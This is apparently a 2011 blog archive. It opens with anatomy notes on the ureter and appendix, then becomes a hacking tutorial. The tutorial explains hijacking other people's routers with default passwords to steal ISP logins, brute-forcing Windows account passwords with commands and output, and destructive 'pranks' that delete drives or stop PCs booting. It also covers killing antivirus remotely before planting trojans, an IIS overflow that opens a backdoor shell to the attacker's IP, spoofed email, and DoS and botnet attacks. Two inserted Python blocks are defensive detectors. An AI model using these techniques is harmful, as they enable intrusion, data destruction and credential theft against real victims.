Sunday, 26 June 2011

Anatomy of Ureter

Definition:
The ureters are a pair of muscular tubes which convey the urine from kidneys (renal pelvis) to the urinary bladder.
Size and Extent:
  • Length: About 25 cm (10 inches)
  • Diameter: About 3 mm
  • Extent: Pelviureteric junction to urinary bladder
Location:
Retroperitoneal structure in the posterior abdominal wall (upper part) and lateral pelvic wall (lower part)
Parts, Courses and Relations:
A) Pelvis of Ureter:
  • Arises from the renal pelvis (leaves kidney from hilum situated medially) formed by calyces encircling the renal papillae
  • Descends along the medial margin of the kidney
  • At the lower end of kidney, it becomes continuous with the abdominal ureter
B) Abdominal ureter:
  • Passes downwards and medially to lie on the medial edge of psoas major
  • Then enters into the pelvis at the bifurcation of the common iliac artery in front of the sacroiliac joint.
  • Anteriorly, the right ureter is covered at its origin by the 2nd part of the duodenum and then lies lateral to the inferior vena cava and behind the posterior peritoneum
  • Right ureter is crossed by the testicular (or ovarian), right colic, and ileocolic vessels. The left ureter is crossed by the testicular (or ovarian) and left colic vessels
  • Then passes above the pelvic brim, behind the mesosigmoid and sigmoid colon to cross the common iliac artery immediately above its bifurcation and enter the true (lesser) pelvis
C) Pelvic ureter:
  • Runs downwards and backwards on the lateral pelvic wall in front of the internal iliac artery to reach just in front of the ischial spine
  • Then turns forwards and medially to enter the urinary bladder
  • In the male it lies above the seminal vesicle near its termination and is crossed superficially by the vas deferens
  • In the female, the ureter passes above the lateral fornix of the vagina lateral to the supravaginal portion of the cervix and lies below the broad ligament and uterine vessels
D) Intravesical ureter:
  • Passes obliquely through the wall of the bladder and opens into it at the lateral angle of trigone
Normal Ureteric Constrictions:
A) 3 Anatomical Constrictions:
  1. Pelviureteric junction
  2. Pelvic brim (Crossing of iliac vessels)
  3. Ureterovesical junction
B) 5 Surgical Constrictions:
  1. Pelviureteric junction
  2. Pelvic brim (Crossing of iliac vessels)
  3. Crossing of Vas deferens(♂) / Broad ligament(♀)
  4. Ureterovesical junction
  5. Ureteric orifice (Intravesical)
These sites of ureteral narrowing are clinically significant because they are common locations for urinary calculi to lodge during passage.
Comparison with Esophageal constrictions:
Esophagus has 4 constrictions but ureter has 5 constrictions (surgical).
  1. Cricopharyngeal = Pelviureteric
  2. Crossing of aorta = Crossing of iliac artery
  3. Crossing of left main bronchus = Crossing of vas deferens/broad ligament
  4. Diaphragmatic hiatus = Ureterovesical junction
Blood Supply:
1. Abdominal part: Branches from Renal artery, Abdominal aorta and Gonadal artery
2. Pelvic part:
  • As it crosses pelvic brim: Branches from Common Iliac and Internal Iliac arteries
  • Inside the pelvis: Inferior vesical artery (Male) and Uterine artery (Female)
Veins correspond to the arteries
Nerve Supply:
  • Sympathetic: T10-L1 spinal segments
  • Parasympathetic: S2-S4 nerves
Histology:
From inside to outside
1) Mucosa:
  • Presents a few longitudinal folds giving its lumen a star shaped appearance
  • Epithelial lining: Transitional epithelium
  • Lamina propria: Fibrous tissue containing many elastic fibers, blood vessels and nerves
2) Muscularis:
  • Smooth muscles
  • Upper 2/3 of ureter: Inner longitudinal and Outer circular fibers
  • Lower 1/3 of ureter: Inner longitudinal, Middle circular and Outer Longitudinal fibers
3) Adventitia:
  • Fibrous connective tissue
  • A portion of the ureter has serosa (mesothelium/simple squamous epithelium) covering it
Development of Ureter:
  1. Mesodermal in origin
  2. Metanephric duct (Ureteric bud) appears as a diverticulum at the lower end of the mesonephric duct
  3. The metanephric duct (Ureteric bud) develops into the ureter, pelvis, calyces and collecting tubules
  4. On top of metanephric duct, later a cap of tissue differentiates to form the definitive kidney or metanephros which develops into the glomeruli and the proximal part of the renal duct system.
Congenital anomalies:
1. Ureteral duplication: The mesonephric duct may give off a double metanephric bud so that 2 ureters may develop on one side (Double ureter) or both sides (Bifid ureter). These ureters may fuse into a single duct anywhere along their course or open separately into the bladder
2. Ectopic ureter: Extra ureter may open ectopically into the vagina or urethra resulting in urinary incontinence.
3. Retrocaval ureter: Ureter deviates medially and passes behind the inferior vena cava, winding about and crossing in front of it from medial to lateral side. It may lead to right lumbar pain, recurrent urinary tract infections or episodes of acute pyelonephritis.
Detecting Ureteric Calculi:
Figure: Calculi in left ureter lateral to spine
In searching for a ureteric stone on a plain radiograph of the abdomen, one must imagine the course of the ureter in relation to the bony skeleton. It lies along the tips of the transverse processes, crosses in front of the sacroiliac joint, swings out to the ischial spine and then passes medially to the bladder.
An opaque shadow along this line is suspicious of calculus. This course of the ureter is readily studied by examining a radiograph showing a radio-opaque ureteric catheter in situ.

Appendix and Appendicitis - Anatomy


Also called the vermix, the vermiform appendix is a narrow worm-shaped tube arising from the posteromedial aspect of the cecum (a large blind sac forming the commencement of the large intestine) about 1 inch below the ileocecal valve. The small lumen of the appendix opens into the cecum and the orifice is guarded by a fold of mucous membrane known as the ‘valve of Gerlach’. The 3 taeniae coli (taenia libera, taenia mesocolica and taenia omentalis) of the ascending colon and caecum converge on the base of the appendix.
Although the appendix serves no digestive function, it is thought to be a vestigial remnant of an organ that was functional in human ancestors.
The length varies from 2 to 20 cm with an average of 9 cm with diameter of about 5mm. It is longer in children compared to adults. In the fetus it is a direct outpouching of the caecum, but differential overgrowth of the lateral caecal wall results in its medial displacement.
The appendix is suspended by a small triangular fold of peritoneum, called the mesoappendix.
Clinical
  • Inflammation of the appendix is known as the appendicitis. Acute appendicitis is a common cause of abdominal pain requiring surgery, particularly in the West where there is low roughage diet. Appendicitis usually follows obstruction of the lumen with distal infection and ulceration. The usual causes are: fecolith, calculi, foreign body, tumor, worms (Oxyuriasis vermicularis), diffuse lymphoid hyperplasia, vascular occlusion, inadequate dietary fiber intake, etc.
  • The lumen of the appendix is relatively wide in the infant and is frequently completely obliterated in the elderly. Since obstruction of the lumen is the usual precipitating cause of acute appendicitis it is not unnatural, therefore, that appendicitis should be uncommon at the two extremes of life. It is seen more commonly in older children and young adults.
Location of Appendix:
  • Right lower quadrant of abdomen and more specifically right iliac fossa.
  • McBurney’s point lying at the junction of lateral one-third and the medial two-thirds of the line joining the umbilicus to the right anterior superior iliac spine roughly corresponds to the position of the base of the appendix.
  • McBurney’s point is the site of maximum tenderness in appendicitis.
Clinical
  • Examination of a case of acute appendicitis reveals following physical signs:
    1. Hyperaesthesia in the right iliac fossa
    2. Tenderness at McBurney’s point
    3. Muscle guard and rebound tenderness over the appendix
  • Appendicectomy is usually performed through a muscle-splitting incision in the right iliac fossa. The caecum is delivered into the wound and, if the appendix is not immediately visible, it is located by tracing the taeniae coli along the caecum—they fuse at the base of the appendix. When the caecum is extraperitoneal it may be difficult to bring the appendix up into the incision; this is facilitated by first mobilizing the caecum by incising the almost avascular peritoneum along its lateral and inferior borders.
Variations in Appendix position:
Although the base of the appendix is fixed, the tip can point in any direction. Hence, the position of the appendix is extremely variable. The appendix is the only organ in the body which is said to have no anatomy. When compared to the hour hand of a clock, the positions would be:
  1. 12 o'clock: Retrocolic or retrocecal (behind the cecum or colon)
  2. 2 o'clock: Splenic (upwards and to the left – Preileal and Postileal)
  3. 3 o'clock: Promonteric (horizontally to the left pointing the sacral promontory)
  4. 4 o'clock: Pelvic (descend into the pelvis)
  5. 6 o'clock: Subcecal (below the cecum pointing towards inguinal canal)
  6. 11 o'clock: Paracolic (upwards and to the right)
Most common position of appendix (75% of cases): Retrocecal
Second most common position of appendix (20% of cases): Subcecal
If the appendix is very long, it may actually extend behind the ascending colon and abut against the right kidney or the duodenum; in these cases its distal portion lies extraperitoneally.
Clinical

The location of the tip of the appendix determines early signs and symptoms of appendicitis.
  • Retrocecal: Extension of the hip joint may cause pain because the appendix is disturbed by stretching of the psoas major muscle. Pain usually localizes in the right flank.
  • Pelvic: Pain may be felt when the thigh is flexed and medially rotated, because the obturator internus is stretched. Pelvic appendix may irritate the bladder or rectum causing suprapubic pain, pain with urination, or feeling the need to defecate.
  • Retroileal: In some males, it can irritate the ureter and cause testicular pain.
  • Pregnancy: the appendix can be shifted and patients can present with RUQ (Right upper quadrant) pain.
Arterial Supply:
  1. Appendicular artery: The mesoappendix, containing the appendicular branch of the ileocolic artery (branch of superior mesenteric artery), descends behind the ileum.
  2. Accessory appendicular artery: An accessory appendicular artery can branch from the posterior cecal artery which is also a branch of ileocolic artery.
Clinical
  • Acute infection of the appendix may result in thrombosis of the appendicular artery with rapid development of gangrene and subsequent perforation.
  • The accessory appendicular artery can lead to significant intraoperative and postoperative hemorrhage and should be searched for carefully and ligated once the main appendicular artery is controlled.
Venous drainage:
Appendicular vein –> Ileocolic vein –> Superior mesenteric vein –> Portal vein
Lymphatic drainage:
  • There is abundant lymphoid tissue in its walls.
  • From the body and apex of the appendix 8-15 vessels ascend in the mesoappendix and are occasionally interrupted by one or more nodes –> unite to form 3 or 4 larger vessels –> inferior and superior ileocolic nodes
  • A few of them pass indirectly through the appendicular nodes situated in the mesoappendix.
Clinical
Appendicular dyspepsia: Chronic appendicitis produces dyspepsia resembling disease of stomach, duodenum or gall bladder. It is due to passage of infected lymph to the subpyloric lymph nodes which causes irritation of pylorus.
Nerve supply:
  1. Sympathetic nerves: T9 and T10 spinal segments through the celiac plexus
  2. Parasympathetic nerves: Vagus
Clinical
Both the appendix and the umbilicus are innervated by segment T10 of the spinal cord and hence the pain caused by appendicitis is first felt in the region of umbilicus (referred pain). With increasing inflammation pain is felt in the right iliac fossa due to involvement of the parietal peritoneum of the region which is sensitive to pain in contrast to pain insensitive visceral peritoneum.
Histology: Inside to outside
1. Mucosa:
  • No villi
  • Epithelium invaginates to form crypts of Lieberkühn but the crypts do not occur as frequently as in the colon
  • Muscularis mucosae is ill defined
2. Submucosa:
  • Large accumulations of lymphoid tissue in the lamina propria and submucosa. Hence appendix is also called abdominal tonsil.
  • There is often fatty tissue in the submucosa.
3. Muscularis externa:
  • Thinner than in the remainder of the large intestine
  • Comprises 2 layers: Inner circular muscle layer and Outer longitudinal muscle layer
  • Outer longitudinal smooth muscle layer does not aggregate into taenia coli
4. Serosa and peritoneum
Clinical:
The submucosal lymphoid follicles enlarge, peak from 12-20 years, and then decrease. This correlates with the incidence of appendicitis. Enlarged or hyperplastic lymphoid follicles contribute to the obstruction of the small lumen of the appendix.
Pathology:
In acute appendicitis, the microscopy of cross section of appendix reveals:
  1. Fibrin on peritoneal surface
  2. Neutrophil exudate in lumen
  3. Neutrophil exudate spreads in submucosa and soon affects all layers



Wednesday, 22 June 2011

voice search for all search engines

Voice Search provides a method to search by speaking. For example, just click on the microphone and say "kittens" to search for kittens. If you specifically want pictures of kittens, say "google images kittens". Want to learn more about World War II? Say "wikipedia world war two".

Voice Search comes pre-loaded with the following default services: Google, Wikipedia, YouTube, Bing, Yahoo, DuckDuckGo and Wolfram|Alpha. You can also add your own user-defined search engines. It also integrates speech input buttons for text fields on all websites.

Feature suggestions or bug reports? Go to http://purl.eligrey.com/github/voice-search/issues to file them. Please note that keyboard shortcut support or automatically capturing speech input as soon as the extension button is clicked are not possible at this time.
 

Saturday, 18 June 2011

Accessing Routers

Routers are devices used to route data on a network; a Router decides where certain traffic should be sent. A Router acts as a gateway to the Internet and is used by most people these days to access the Internet instead of a Modem. A client PC can be connected to the Router either through a LAN cable or with a Wireless card. Routers are mostly configured through a web-based system or from a command prompt window (cmd).

Most home users with ADSL use Routers as their gateway to the Internet.

Some Routers are configured so that they can only be administered through the web-based system when you are connected to the Router's local network - the internal LAN. To connect to the Router you use your web browser. A typical Router IP address would be 192.168.0.1, so this would be the address to use to connect to the Router through a browser: http://192.168.0.1/

If you are using a Router as your Internet gateway, try connecting to it. Remember the Router's IP address could differ from the example above. If you don't know your Router's IP address, go to the command prompt and type in: ipconfig

Your local area connection gateway address will be your Router's IP address. Remember the Router is your gateway to the Internet.

When you are connected to your Router through the web-based system it will ask you for a username and password. If you know the login details, use them to log into the Router. If you do not know the login details you can try the default login details as set by the Router manufacturer. Have a look at this list with default login details.

In your Router's configuration you can set the settings which the Router uses to connect to the Internet, security settings, local LAN configurations, DHCP settings, port forwarding, statistics and information about the Router status and many more.

Accessing a Router through a command prompt window can be achieved by going to command prompt (cmd) and typing in:

telnet 192.168.0.1 23

23 is the port on which the Router will be accessed.

You can access someone else's Router over the Internet, login and change settings or even steal their ISP (internet service provider) details. When you Telnet to a Router and it brings up the login screen it sometimes will show you what make and model the Router is. Then check the default password list and see if you can login with those default login details and obtain access to the Router. If the person whose Router it is has not changed the Router's default login details you should be able to access the Router easily. Most home users do not change the default passwords. When you access someone else's Router over the Internet, you can change settings, forward ports, reset the Router or even steal their ISP (internet service provider) details.

Now if you are able to get into a Router, ADSL router in this case, you will be able to get the host's ADSL username and password. The password would be masked and hidden behind ****'s but if you right click on the page and look at the source the password most of the time is displayed in clear text. Otherwise use a program like RevelationV2 to unmask the password.

Telnetting to a Marconi ADSL Router with the CX82310 chip from Conexant on port 23 will give the following output:

01/01/99 CONEXANT SYSTEMS, INC. 00:04:10
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21

LOGIN PASSWORD>

And logging into the Router will bring up the main menu:

01/04/99 CONEXANT SYSTEMS, INC. 02:00:45
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.29

MAIN MENU

1. SYSTEM STATUS AND CONFIGURATION
2. ADSL MENU

4. REMOTE LOGON

Q. LOGOUT

ENTER CHOICE-->

This specific Marconi Router has a vulnerability: if you Telnet to the Router on port 254 ( as shown above ) and the enter key is pressed ( blank login password ), you will gain access to the Router. From this menu the Router can be remotely reset to factory settings, allowing a permanent denial of service attack until it is reconfigured manually.

Another vulnerability of this Marconi Router is that when you connect to the Router with the web based GUI ( graphical user interface ) you will be able to see the ISP password when viewing the webpage source. http://192.168.10.200/Bconfig /System.sht
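The clear-text password in the page source, described here and in the ADSL paragraph above, is a server-side flaw: the device writes the stored secret into the `value` attribute and relies on the browser to mask it. The following check is an added example, not code from the original post or from any router vendor; it audits a saved copy of an admin page for that pattern, and the field names, sample pages and hint list are constructed assumptions.

```python
from html.parser import HTMLParser

# Substrings that suggest a credential field. Assumed heuristic, tune per device.
SECRET_HINTS = ("pass", "pwd", "secret", "psk", "key")
# Characters a server may send as a harmless "a value is set" placeholder.
PLACEHOLDER_CHARS = set("*\u2022\u25cf")

# Constructed sample: the weak pattern, stored secrets written into the markup.
WEAK_PAGE = """
<form action="/save" method="post">
  <input type="text" name="ppp_username" value="user@example-isp">
  <input type="password" name="ppp_password" value="constructed-isp-secret">
  <input type="hidden" name="admin_pwd" value="constructed-admin-secret"/>
</form>
"""

# Constructed sample: the hardened pattern, the secret never leaves the device.
HARDENED_PAGE = """
<form action="/save" method="post">
  <input type="text" name="ppp_username" value="user@example-isp">
  <input type="password" name="ppp_password" value="" autocomplete="new-password">
  <input type="password" name="admin_pwd" value="********">
</form>
"""


class SecretEchoAuditor(HTMLParser):
    """Collects <input> fields whose stored secret reaches the browser."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attr = {name.lower(): (value or "") for name, value in attrs}
        field_type = attr.get("type", "text").lower()
        field_name = attr.get("name") or attr.get("id") or "(unnamed)"
        value = attr.get("value", "")
        # An empty value or a run of mask characters is not a leaked secret.
        if not value or set(value) <= PLACEHOLDER_CHARS:
            return
        looks_secret = any(h in field_name.lower() for h in SECRET_HINTS)
        # type="password" only masks on screen; the value is still in the HTML.
        if field_type == "password" or looks_secret:
            # Report the field, never the value, so the audit log stays clean.
            self.findings.append((field_name, field_type))


def audit_page(html):
    """Return (field name, field type) for every input that echoes a secret."""
    auditor = SecretEchoAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for label, page in (("weak", WEAK_PAGE), ("hardened", HARDENED_PAGE)):
        print(label, audit_page(page))
```

The fix belongs in the firmware or web application: render password fields empty and treat a blank submission as "keep the current value".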

Cracking a user account locally and remotely - brute force or dictionary attack Win2K and WinXP

When you need the password of an account on your local machine or on a remote machine you can either brute force or dictionary attack the account. Remember this could take from 1 minute to a few days depending on how complex the password is.

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

First program we will use is LBRUTE.

Lbrute is a program which you can use to guess a user account password with a dictionary attack while logged onto the machine locally. You will need a wordlist which Lbrute can use to guess the password. Example of how to use Lbrute:

C:\password\brute\lbrute>lbrute -d -u guest -f wordlist.txt

lbrute v0.9 - Windows NT Local logon password brute forcing utility
Copyright (C) 2005-2006 Pranay Kanwar < warl0ck@metaeye.org>

[+] On TESTPC running Windows XP

[+] Counting words....77012 words.
[+] Trying 77012 words from wordlist.txt for 'guest'
[+] Done 21%.
[+] Password for user 'guest' is password555.

The password was guessed and is displayed as: password555.

-d tells Lbrute that this will be a dictionary attack

-u is the account you're trying to crack

-f is the name of the wordlist you will be using

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Second program we will use is Starbrute

Starbrute can either be used to crack a user account on your own local PC or it can be used to crack a user account on a remote PC. Starbrute uses brute force to guess the password. Meaning it will use Charset:1234567890abcdefghijklmnopqrstuvwxyz in random order to guess the password.

Example of how to use Starbrute:

C:\password\StarBrute\StarBrute>starbrute 192.168.0.3 guest 3 4 high

════════ Starsky32 IPC bruteforce ════════

▓ Target IP:192.168.0.3
▓ User Account:guest
▓ Charset:1234567890abcdefghijklmnopqrstuvwxyz
▓ Start lenght:3
▓ Max lenght:4
▓ Process priority: High

■ Starting...
» Trying 3 letters lenght passwords...

Terminated. Password found: 111

The password was brute forced and is displayed as: 111.

192.168.0.3 is the IP of the machine you're trying to get the account password from.

guest is the account name you're trying to crack

3 is the start length of the password

4 is the maximum length of the password

high means the program will use a lot of resources - the higher the faster it can guess the password

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

With both these programs you can specify any account on a machine - administrator, guest or whatever.

Remember you can find out what account is logged onto a machine by typing in this command into CMD: nbtstat -a IP

It will show you the username currently logged on and then you can try and crack that account password.
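Both tools above produce a dense run of failed logons against one account, which is the signal a defender should alert on. The following detector is an added example, not part of the original post or of either tool; the log format (timestamp, outcome, source, account), the addresses and the thresholds are constructed assumptions, and in practice the records would come from the Windows Security event log or a central log collector.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: one user mistyping a password, then a guessing run.
SAMPLE_LOG = (
    [
        "2011-06-18T09:58:00 FAIL 192.168.0.20 alice",
        "2011-06-18T09:58:20 FAIL 192.168.0.20 alice",
        "2011-06-18T09:58:40 OK 192.168.0.20 alice",
    ]
    + [f"2011-06-18T10:00:{s:02d} FAIL 192.168.0.7 guest" for s in range(12)]
    + ["2011-06-18T10:00:12 OK 192.168.0.7 guest"]
)


def parse(line):
    """Split one record of the assumed format into typed fields."""
    ts, outcome, source, account = line.split()
    return datetime.fromisoformat(ts), outcome, source, account


def detect_guessing(lines, threshold=10, window=timedelta(seconds=60)):
    """Flag (source, account) pairs with >= threshold failures inside window.

    Also records whether a successful logon followed the burst, which turns
    a noisy event into a probable compromise that needs a password reset.
    Records are assumed to arrive in time order.
    """
    recent = defaultdict(deque)  # (source, account) -> failure times in window
    alerts = {}                  # (source, account) -> alert record
    for line in lines:
        ts, outcome, source, account = parse(line)
        key = (source, account)
        if outcome == "FAIL":
            failures = recent[key]
            failures.append(ts)
            # Slide the window: drop failures older than `window`.
            while ts - failures[0] > window:
                failures.popleft()
            if len(failures) >= threshold:
                alert = alerts.setdefault(key, {
                    "source": source,
                    "account": account,
                    "peak_failures": 0,
                    "success_after": False,
                })
                alert["peak_failures"] = max(alert["peak_failures"], len(failures))
        elif outcome == "OK" and key in alerts:
            alerts[key]["success_after"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG):
        print(alert)
```

An account lockout threshold below the alert threshold bounds how many guesses a run like this gets, and disabling the guest account removes the target used in both examples.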

Pranks to pull on someone

Here are a few things you can do to someone to annoy the living hell out of them :)

1) Blue Screen Of Death : Create a batch file "something.bat" and edit the file so it contains the following (Win9X only)

C:\Aux\Aux
or
C:\Con\Con

Now place this in the C:\Windows\Start Menu\Programs\StartUp folder, so when the pc reboots it will throw out a BSOD every time it starts up.

2) Deleting the persons whole C drive with this command : Deltree /y c:/*.*

3) Make a screenshot of the person's desktop, put that picture as their background and hide the start bar and desktop icons. With 2000 and XP, lock the PC and move the windows out of the way, just check how clever your friend really is. Or put a password on a screen saver and put the screen saver file into the startup folder. They will have to boot up into safe mode to restore the screen saver.

4) A nice harmless trick, schedule something like a screen saver with a password on a PC for a certain time, sure to make someone scream.

5) Go to the windows directory and look for a file Win.ini. Edit the file and look for a line with : shell=Explorer.exe. Change this to something like YOUR PC HAS A VIRUS ON IT. When the PC gets restarted it will come up with that message and it will not boot up at all. Look for system.ini and change the same line, from shell=explorer.exe to shell="Bill Gates Hates You".

Getting someone's IP and doing a ping sweep

Download IPstealer from WindowsHacker and put in your IP, then click on Convert IP, Click on Listen and send your victim the Link to use. When they open that link it will show up in IPstealer.

If you need random IP addresses you can do a ping sweep. It scans a whole IP range and shows you which IPs are online. Download Supercan and put in an IP range. Start 80.23.23.1 to Stop 80.23.23.255 and choose "ping only" under scan type. It will scan the whole IP range and show you which IPs are online.

Killing programs or processes remotely

Let's say you try and upload a trojan to someone's machine and their anti virus picks it up. Check if you can get an account on the machine with Administrator rights. If you have an account like that, you can use PSKILL and kill the anti virus program or firewall. You can basically kill any program or process running on the machine, but it must be a Win2k or XP machine. If the person is running norton anti virus the file will be something like nav32.exe. Now with pskill the command will be :

pskill \\66.33.22.11 -u administrator nav32.exe

66.33.22.11 is the IP or pc name of the victim

-u administrator is the account you have admin rights to

Nav32.exe is the program file name or process you want to kill. You can even use winlogon.exe and it will most probably give a blue screen after you killed that process.

So now you killed the anti virus or firewall and now you are ready to upload a trojan or keylogger or anything you like...

Connecting to MIRC/KAZAA/ICQ thru a firewall that has certain ports blocked with a SOCKS server

When you are behind a firewall and mIRC, Kazaa or ICQ is blocked you can use a technique called HTTP tunneling. Basically your program connects to a program running on your computer and that program redirects the data through HTTP. Download HTTPORT or SOCK2HTTP. It will run a SOCKS server on your PC which you can use to connect mIRC, Kazaa, ICQ or whatever program you want to use that is blocked by the firewall. In mIRC or Kazaa go to settings and tell the program to connect to your SOCKS server. Server address is 127.0.0.1 - your local IP - and the SOCKS port is port 1080.

Resetting and cracking Win2K or WinXP administrator password

Resetting your Win2K admin password is easy. Boot up with a Win9X boot up disk or CD. Go to the Winnt\system32\config directory. There will be a file called "SAM". Delete that file and reboot the machine. Now the Administrator account password will be reset to blank ( no password ). Only works with FAT32 partitions.

For Windows XP you need this file, which has a few utilities you can use to reset the XP administrator password.

Then there is also a program called AdminHack which you load in a dictionary file to crack the administrator account if you have local access on the PC.

Anonymous email / Email as any address

Download RA-Anonymous email first. Then choose who you want to send to and who you want the email to be from. For this to work you will have to find an SMTP server that accepts relaying. So in the server space put in : "smtp.mweb.co.za" - this smtp worked at the time I tested it - and you are ready to send someone email from billgates@microsoft.com !! :) Use OPENRELAYCHECKER from my downloads page, which you can use to search for email servers that support relaying.

Alternatively use www.Hidd3d.com to send anonymous email.

Connecting to mIRC through a Wingate

A wingate is like a proxy server: anyone can connect to the server (some do have usernames and passwords), and then work through the server to connect to some other server. Then it will look like you are working from that server, your identity changed. mIRC is an internet relay chat client, a chat room client. Download mIRC now !! In mIRC there is a firewall option, this is where you specify your wingate server. Click the "use firewall" option, make sure it's set to socks 4 ! and put in a wingate address in the "hostname". Port should be 1080 with no username or password. Wingate list available from Cyberarmy or you can use any port scanner, or you can use Proxy finder to search for socks wingate on a subnet. Scan any IP range for hosts that have port 1080 open. Wingates are great for IRC to keep you anonymous.

Creating undeleteable directories remotely

Now this is something that can really create havoc!!! I tested it on Win9X and Win NT4. Does not work on Win2k or Win XP. Beware, don't try this on yourself!! Windows 9x and NT 4 have a flaw which allows a remote connection to create undeleteable, well practically undeleteable, files and directories anywhere on a remote machine. These files and directories can be deleted, but it takes about 2 minutes to delete through dos commands. Download NetBiosBomber, choose the target and choose which OS and you are ready to make someone's life hell. Remember if their system is updated it will not work.

Crashing Win95/Win98 PC with any access to a share

Windows 95/98 does not react well to the /con/con command. Any Windows 98/95 PC can be crashed with this /con/con exploit, but you need access to a share on the PC, any access will work.

Create a htm file with the following code in it :

# (remove tht '#' when u type)

click me!

#
The pcname is the PC name of the PC you want to crash ( or the IP ) and the sharename is the share you got access to. When you open the htm file and click on the link, it will crash ( BSOD ) the PC.

IP addresses, understanding it

Everyone that connects to a network has got an IP address. An IP address looks something like this : 80.65.123.25

Your network card has an IP address and your modem has an IP address if you connect to the Internet, but the two are different because your LAN is not part of the Internet. When you connect to the Internet, depending on your connection, you get a fixed ( static ) IP or a dynamic IP. Modem users get an IP address that changes every time they reconnect to the Internet. Very useful if you attack people, so if you disconnect, then you get a different IP. If you have an ISDN or maybe ADSL connection most of the time you will get a static IP, so whenever you connect to the Internet you get the same IP every time. Attack someone without IP spoofing, and they will be able to see it is your IP attacking them! They can then go to your ISP ( internet service provider ), check who this IP belongs to and you can get into trouble. This is where modem users are lucky, they don't have a static IP and can go mad and attack people and so on without being caught, well almost... Their ISP can still check who was using the certain IP for a certain time and what telephone number it was coming from, but it's too much of a hassle for a simple DOS attack.

IP spoofing is basically when you attack someone and you use a bogus IP. A DOS attack or whatever, it attacks the target, but the target only receives data from bogus IPs. IPs that do not really exist, or that do exist but belong to someone else, not you.

Every network card has a burned in MAC address. A MAC address looks something like this : 00-40-AH-4E-E0-90, it cannot be changed - well kind of, so if you attack someone and they do a nbtstat on you and get the MAC address of your network card, it is a simple way of identifying you as the attacker.

IIS ( Web server/web page) hacking

IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing an IIS server is actually very easy. A lot of system administrators do not load patches on their IIS servers so they are the people who get defaced (hacked). The IIS servers I will show you how to hack are IIS 4/5. IIS 6 is the industry standard at the moment, but there are still a lot of IIS 4/5 servers online. The way IIS servers are being hacked is through buffer overflows and exploits. This is when a certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there are a lot of IIS hacking tools making it easy for anyone to hack an IIS server. Not all webservers are run on IIS, there is a lot of other webserver software out there like Apache. We will only be dealing with IIS servers.

Firstly you have to find an IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running. Another way is to telnet to the IP on port 80. In dos prompt (Start, Run, CMD) type in : telnet 196.35.45.21 80. It will open telnet and show you what IIS the host is running. Web servers normally run on port 80, but it can be any other specified port.

If you find a IIS server, it's time to DEFACE it :) Go check on my IIS hacking page for IIS hacking programs. We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt (Start, Run) run jill-win32. It will show you this :

iis5 remote .printer overflow.
dark spyrit < dspyrit@beavuh.org> / beavuh labs.
usage: jill-win32

An example how to use it :

jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs it IIS service on, 196.89.65.45. is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, which TFPD32 listening on.

Here is a another example :

Download IISHack and do the following :

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM

For those people who does not have a clue what's going on in here, go the script kiddie way and download the other GUI ( graphical user interface ) IIS hacking programs from my IIS page and let the program deface the web page for you. There is a few IIS tutorials in Windows hacker misc section.

Disconnecting someone from internet (DOS attack) - (Nuking)

Nuking was in the Windows 95/ NT4 days. The original WinNuke was for Windows 95. It attacked the host on port 139 (win95) and port 135 (winNT). Yes someone people still use Windows 95 and NT4, but not alot of people. If you find someone by any chance, use Superkod. I found it works best. Open up the program, type in the IP and Click NUKE. If the person is using Win95 or WinNT4, and their unpatched, their internet connection will be dropped or they will get a BSOD.

That's all very well and all, but with a program like KOD, it does not hide your IP from your attacker. If they are running a firewall, they will see where all this traffic is coming from and they will see it's YOU. So now, you need to spoof your IP address so the attacker cannot see who the attack is coming from. For Win2k/XP, I would recommend using Smurf2k, Nemesy or Jolt that was designed for attacking Win2k, but Jolt does not spoof the IP so beware, only Smurf2k and Nemesy spoofs the IP. Smurf2k uses a broadcast list, a list it uses for address to spoof from. So if you attack someone, they will see IP's attacking them that does not exist. Before you attack someone, find out what connections he has, because if he want to attack him with bandwidth, you will need more than him. So if it is an modem user with no firewall, you will be able to disconnect him yourself. If it is someone with more bandwidth than you, a firewall or a patched system, you will need BANDWITH to disconnect him. So gather around a few of your buddies, give them a DOS tool and all of you guys at the same time attack him. Make sure you run a firewall that blocks incoming IGMP, ICMP, UDP and TCP incoming connections if they start attacking back. Heck even better, infect a few hosts on a ADSL line or a corporate line with alot of bandwidth, and take down microsoft.com.

This is the part when Zombies comes in. You infect a few hosts (Zombies) and control them to do a DOS attack on someone. It works almost like a trojan which you infect their PC and take control of it.

Try Freak88 - it allows you to control a few PC's at the same time and do a DOS attack.

Getting a PC name, MAC address and user name logged on

